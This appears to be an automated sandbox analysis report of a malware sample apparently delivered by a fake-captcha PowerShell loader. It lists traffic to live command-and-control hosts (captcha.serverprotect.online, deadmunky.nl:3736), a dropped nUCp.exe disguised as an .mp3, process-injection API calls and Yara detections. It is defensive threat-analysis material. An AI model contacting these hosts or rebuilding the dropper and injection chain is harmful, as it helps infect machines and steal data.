URLs: https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t

Source: global traffic

TCP traffic: 192.168.2.10:49701 -> 194.113.106.180:3736

Source: Joe Sandbox View

ASN Name: RACKTECHRU RACKTECHRU

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6

Source: Network traffic	Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 194.113.106.180:3736 -> 192.168.2.10:49707
Source: Network traffic	Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 194.113.106.180:3736 -> 192.168.2.10:49706

Source: global traffic

HTTP traffic detected: POST /98aa7e1ce731c6206ebbe457e9f2dc7088adc3c628bee08/verify HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: captcha.serverprotect.onlineContent-Length: 0Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\System32\OpenWith.exe

Code function: 6_3_00007DF46E504D8C WSARecv,

6_3_00007DF46E504D8C

Source: global traffic	DNS traffic detected: DNS query: captcha.serverprotect.online
Source: global traffic	DNS traffic detected: DNS query: deadmunky.nl

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 15 Sep 2024 13:02:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval';img-src 'self' cdn.discordapp.com;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FuF43JeoqhMAqUT5LOSzO%2Bz9h%2By3fEAHk625AHJJQmuTlnrGf%2F%2FKSw770iowiD983krP0KPpLapaLsdWPF4WpjHEvZscp7GjHELFjKx3u6E2OiRG8%2Bl9YssPG6EiXpwnTOZHITt%2Bj2AqxaXxVMBn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c38cf795b637d06-EWRalt-svc: h3=":443"; ma=86400

Source: powershell.exe, 00000000.00000002.1371224256.00000177D7CE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://captcha.serverprotect.online
Source: powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1371224256.00000177D69C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1371224256.00000177D67A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1371224256.00000177D69C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.czl
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000000.00000002.1371224256.00000177D67A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1371224256.00000177D787B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://captcha.serverprotect.online
Source: powershell.exe, 00000000.00000002.1371224256.00000177D7EA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1371224256.00000177D787B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://captcha.serverprotect.online/98aa7e1c
Source: powershell.exe, 00000000.00000002.1371224256.00000177D787B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://captcha.serverprotect.online/98aa7e1ce731c6206ebbe457e9f2dc7088adc3c628bee08/verify
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: OpenWith.exe, 00000006.00000003.1514008533.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t
Source: OpenWith.exe, 00000005.00000002.1462963482.00000000027BC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t(
Source: OpenWith.exe, 00000005.00000003.1462414332.0000000005184000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8tkernelbasentdllkernel32GetProcessMitigationPol
Source: OpenWith.exe, 00000006.00000003.1549035844.0000011F7B715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: OpenWith.exe, 00000006.00000003.1549035844.0000011F7B715000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000000.00000002.1371224256.00000177D69C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1371224256.00000177D787B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 104.21.82.103:443 -> 192.168.2.10:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49722 version: TLS 1.2

Source: nUCp.exe, 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_520f4a7b-2

Source: nUCp.exe, 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_c9e0cf07-5

Source: Yara match	File source: 4.3.nUCp.exe.4760000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.nUCp.exe.4540000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.OpenWith.exe.4db0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.OpenWith.exe.4fd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1395128336.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1392146550.0000000004760000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nUCp.exe PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OpenWith.exe PID: 5860, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7316.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Documents\nUCp.mp3			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Documents\nUCp.exe (copy)			Jump to dropped file

Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB30C7 NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlFreeHeap,RtlFreeHeap,	6_3_0000011F7ABB30C7
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DADD4 NtAcceptConnectPort,	6_3_00007DF46E4DADD4
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DBE6C NtAcceptConnectPort,	6_3_00007DF46E4DBE6C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DAE5C NtAcceptConnectPort,	6_3_00007DF46E4DAE5C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DAF40 NtAcceptConnectPort,	6_3_00007DF46E4DAF40
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DAF60 NtAcceptConnectPort,	6_3_00007DF46E4DAF60
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DAC0C NtAcceptConnectPort,	6_3_00007DF46E4DAC0C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DACC8 NtAcceptConnectPort,	6_3_00007DF46E4DACC8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DBCC0 malloc,NtAcceptConnectPort,NtAcceptConnectPort,free,	6_3_00007DF46E4DBCC0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DACE8 NtAcceptConnectPort,	6_3_00007DF46E4DACE8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DAD14 NtAcceptConnectPort,	6_3_00007DF46E4DAD14
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DC7CC NtAcceptConnectPort,	6_3_00007DF46E4DC7CC
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DC70C NtAcceptConnectPort,	6_3_00007DF46E4DC70C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DD3C0 NtAcceptConnectPort,NtAcceptConnectPort,	6_3_00007DF46E4DD3C0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DC47C NtAcceptConnectPort,	6_3_00007DF46E4DC47C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DB498 NtAcceptConnectPort,calloc,DuplicateHandle,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,	6_3_00007DF46E4DB498
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DD2F4 NtAcceptConnectPort,NtAcceptConnectPort,	6_3_00007DF46E4DD2F4
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4DC10C NtAcceptConnectPort,	6_3_00007DF46E4DC10C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_2_0000011F791B15AC NtAcceptConnectPort,	6_2_0000011F791B15AC
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_2_0000011F791B1A90 NtAcceptConnectPort,NtAcceptConnectPort,	6_2_0000011F791B1A90
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_2_0000011F791B0AC8 NtAcceptConnectPort,NtAcceptConnectPort,	6_2_0000011F791B0AC8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_2_0000011F791B1CD0 NtAcceptConnectPort,CloseHandle,	6_2_0000011F791B1CD0
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_00007DF4B9901CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free,	8_3_00007DF4B9901CE8
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_00007DF4B9901958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,	8_3_00007DF4B9901958
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F252C NtAcceptConnectPort,	8_2_0000021CE78F252C
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F2C64 NtAcceptConnectPort,	8_2_0000021CE78F2C64
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F2418 NtAcceptConnectPort,	8_2_0000021CE78F2418
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F29D4 NtAcceptConnectPort,	8_2_0000021CE78F29D4
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F2990 NtAcceptConnectPort,	8_2_0000021CE78F2990
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F28B8 NtAcceptConnectPort,	8_2_0000021CE78F28B8
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F28E8 NtAcceptConnectPort,	8_2_0000021CE78F28E8
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F288C NtAcceptConnectPort,	8_2_0000021CE78F288C
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78F27B8 NtAcceptConnectPort,	8_2_0000021CE78F27B8
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_00007DF4B9901E64 CreateProcessW,NtResumeThread,CloseHandle,	8_2_00007DF4B9901E64
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_00007DF4B990199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,	8_2_00007DF4B990199C
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_00007DF4B9912704 NtQuerySystemInformation,malloc,NtQuerySystemInformation,	8_2_00007DF4B9912704
Source: C:\Windows\System32\dllhost.exe	Code function: 9_2_0000022FAA4B385C NtQuerySystemInformation,	9_2_0000022FAA4B385C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF7C0CC20B8	0_2_00007FF7C0CC20B8
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_01000BC1	4_2_01000BC1
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB24F7	6_3_0000011F7ABB24F7
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB5E7C	6_3_0000011F7ABB5E7C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB557C	6_3_0000011F7ABB557C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB58FC	6_3_0000011F7ABB58FC
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB4A38	6_3_0000011F7ABB4A38
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB2C3C	6_3_0000011F7ABB2C3C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB1BA6	6_3_0000011F7ABB1BA6
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_0000011F7ABB279C	6_3_0000011F7ABB279C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4B2634	6_3_00007DF46E4B2634
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4FFDE0	6_3_00007DF46E4FFDE0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5A6DAC	6_3_00007DF46E5A6DAC
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E593D84	6_3_00007DF46E593D84
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4C1E54	6_3_00007DF46E4C1E54
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E59AE00	6_3_00007DF46E59AE00
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4E9F4C	6_3_00007DF46E4E9F4C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E599F68	6_3_00007DF46E599F68
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4E0F04	6_3_00007DF46E4E0F04
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E58EBE4	6_3_00007DF46E58EBE4
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E51DC54	6_3_00007DF46E51DC54
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E556C60	6_3_00007DF46E556C60
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4B5C24	6_3_00007DF46E4B5C24
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4CD9F0	6_3_00007DF46E4CD9F0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5969A8	6_3_00007DF46E5969A8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E50CA38	6_3_00007DF46E50CA38
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E529AE0	6_3_00007DF46E529AE0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4FFA94	6_3_00007DF46E4FFA94
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E509B70	6_3_00007DF46E509B70
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E519B38	6_3_00007DF46E519B38
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4CFB24	6_3_00007DF46E4CFB24
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E59FB04	6_3_00007DF46E59FB04
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5ACB04	6_3_00007DF46E5ACB04
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E50B7B8	6_3_00007DF46E50B7B8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E59A8BC	6_3_00007DF46E59A8BC
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4D996C	6_3_00007DF46E4D996C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4CF95C	6_3_00007DF46E4CF95C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5075E4	6_3_00007DF46E5075E4
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5195D0	6_3_00007DF46E5195D0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E50D594	6_3_00007DF46E50D594
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4BF624	6_3_00007DF46E4BF624
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5196E0	6_3_00007DF46E5196E0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E58A3D4	6_3_00007DF46E58A3D4
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4FF3B8	6_3_00007DF46E4FF3B8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4F43F8	6_3_00007DF46E4F43F8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5193F4	6_3_00007DF46E5193F4
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E50A430	6_3_00007DF46E50A430
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E59A4A0	6_3_00007DF46E59A4A0
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E598474	6_3_00007DF46E598474
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E502524	6_3_00007DF46E502524
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E54E24C	6_3_00007DF46E54E24C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5A72C8	6_3_00007DF46E5A72C8
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E59B318	6_3_00007DF46E59B318
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E52CFB4	6_3_00007DF46E52CFB4
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5ABFCC	6_3_00007DF46E5ABFCC
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E59AF80	6_3_00007DF46E59AF80
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4B1058	6_3_00007DF46E4B1058
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4FF02C	6_3_00007DF46E4FF02C
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E5220BC	6_3_00007DF46E5220BC
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E57A168	6_3_00007DF46E57A168
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E50B104	6_3_00007DF46E50B104
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_2_0000011F791B0C5C	6_2_0000011F791B0C5C
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A01F40	8_3_0000021CE7A01F40
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0170E	8_3_0000021CE7A0170E
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A03660	8_3_0000021CE7A03660
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_0000021CE7A0027B	8_3_0000021CE7A0027B
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_00007DF4B9902204	8_3_00007DF4B9902204
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_00007DF4B9904EFC	8_3_00007DF4B9904EFC
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_3_00007DF4B990392C	8_3_00007DF4B990392C
